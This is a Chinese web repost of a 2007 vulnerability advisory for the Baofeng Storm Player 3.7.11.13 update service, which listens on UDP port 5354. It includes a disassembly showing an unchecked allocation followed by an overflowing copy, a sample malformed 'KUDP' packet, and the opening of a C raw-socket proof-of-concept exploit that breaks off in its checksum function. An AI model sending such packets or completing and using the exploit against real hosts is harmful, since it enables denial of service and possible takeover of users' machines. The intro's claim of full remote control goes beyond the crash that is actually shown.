传说中的《暴风影音3》新版本爆漏洞,这次很夸张,远程拒绝服务.
起因是暴风影音自动更新程序会在远程监听一个端口,如果向其发送畸形数据包,就会导致自动更新程序崩溃;如果对其发送精心构造过的数据包,则足以导致用户主机在不知情的情况下被完全控制.
以下是帖子全文:
CISVul20071128
暴风影音3.7.11.13 DOS Vul
|=----------------[ 暴风影音3.7.11.13 DOS Vulnerabilities ]-------=|
|=-----------------------------------------------------------------=|
|=---------------=[ TuTu<tutu@9.cn> ]=-----------------------------=|
|=-----------------------------------------------------------------=|
|=---------------=[ Copyright:www.cisrg.cn ]=----------------------=|
--] 介绍
暴风影音是一款播放软件,经过测试,暴风影音3.7.11.13存在一个远程DDOS漏洞。
官方网站:http://www.baofeng.com/
--] Author:TuTu
--] 漏洞分析
[code]
/*++
暴风影音3 Build version : 3.7.11.13
Test version : 3.7.11.13,自从带了一个自动升级服务stormlive.exe之后,
会在本地开启一个UDP端口5354,向端口发送恶意封包可造成stormlive崩溃
0041DEE0 /$ 8B4424 08 mov eax, dword ptr [esp+8]
0041DEE4 |. 53 push ebx
0041DEE5 |. 8BD9 mov ebx, ecx
0041DEE7 |. 56 push esi
0041DEE8 |. 33C9 xor ecx, ecx
0041DEEA |. 57 push edi
0041DEEB |. 8943 08 mov dword ptr [ebx+8], eax
0041DEEE |. 6A 04 push 4 ; /size = 4
0041DEF0 |. C1E8 07 shr eax, 7 ; |
0041DEF3 |. 40 inc eax ; |
0041DEF4 |. 894B 04 mov dword ptr [ebx+4], ecx ; |
0041DEF7 |. C1E0 07 shl eax, 7 ; |
0041DEFA |. 50 push eax ; |nitems
0041DEFB |. 884B 10 mov byte ptr [ebx+10], cl ; |
0041DEFE |. C703 C0524300 mov dword ptr [ebx], 004352C0 ; |
0041DF04 |. 8943 0C mov dword ptr [ebx+C], eax ; |
0041DF07 |. FF15 78154300 call dword ptr [<&MSVCRT.calloc>] ; \calloc
0041DF0D |. 8B4B 08 mov ecx, dword ptr [ebx+8]
0041DF10 |. 8B7424 18 mov esi, dword ptr [esp+18]
0041DF14 |. C1E1 02 shl ecx, 2
0041DF17 |. 8943 04 mov dword ptr [ebx+4], eax
0041DF1A |. 8BF8 mov edi, eax
0041DF1C |. 8BC1 mov eax, ecx
0041DF1E |. 83C4 08 add esp, 8
0041DF21 |. C1E9 02 shr ecx, 2
0041DF24 |. F3:A5 rep movs dword ptr es:[edi], dword p> 溢出
0041DF26 |. 8BC8 mov ecx, eax
0041DF28 |. 83E1 03 and ecx, 3
0041DF2B |. F3:A4 rep movs byte ptr es:[edi], byte ptr>
0041DF2D |. 8BCB mov ecx, ebx
0041DF2F |. E8 3C140000 call 0041F370
0041DF34 |. 5F pop edi
0041DF35 |. 8BC3 mov eax, ebx
0041DF37 |. 5E pop esi
0041DF38 |. 5B pop ebx
0041DF39 \. C2 0800 retn 8
封包例子
00CAFF84 4B 55 44 50 01 00 55 55 55 00 55 55 55 00 KUDP .UUU.UUU.
由于没有对封包中取得的数据进行判断.数据超大导致申请内存失败,后面的内存数据复制导致异常.
--*/
[/code]
--] exploit POC
[code]
#ifndef WIN32_LEAN_AND_MEAN
#define WIN32_LEAN_AND_MEAN
#endif
#include <winsock2.h>
#include <ws2tcpip.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32")
// Set the packing to a 1 byte boundary
#include <pshpack1.h>
//
// Define the IPv4 header. Make the version and length field one
// character since we can't declare two 4 bit fields without
// the compiler aligning them on at least a 1 byte boundary.
//
typedef struct ip_hdr
{
unsigned char ip_verlen; // 4-bit IPv4 version
// 4-bit header length (in 32-bit words)
unsigned char ip_tos; // IP type of service
unsigned short ip_totallength; // Total length
unsigned short ip_id; // Unique identifier
unsigned short ip_offset; // Fragment offset field
unsigned char ip_ttl; // Time to live
unsigned char ip_protocol; // Protocol(TCP,UDP etc)
unsigned short ip_checksum; // IP checksum
unsigned int ip_srcaddr; // Source address
unsigned int ip_destaddr; // Source address
} IPV4_HDR, *PIPV4_HDR, FAR * LPIPV4_HDR;
//
// Define the UDP header
//
typedef struct udp_hdr
{
unsigned short src_portno; // Source port no.
unsigned short dst_portno; // Dest. port no.
unsigned short udp_length; // Udp packet length
unsigned short udp_checksum; // Udp checksum (optional)
} UDP_HDR, *PUDP_HDR;
// Restore the byte boundary back to the previous value
#include <poppack.h>
//
// Function: checksum
//
// Description:
// This function calculates the 16-bit one's complement sum
// for the supplied buffer.
//
USHORT checksum(USHORT *buffer, int size)
当前位置:
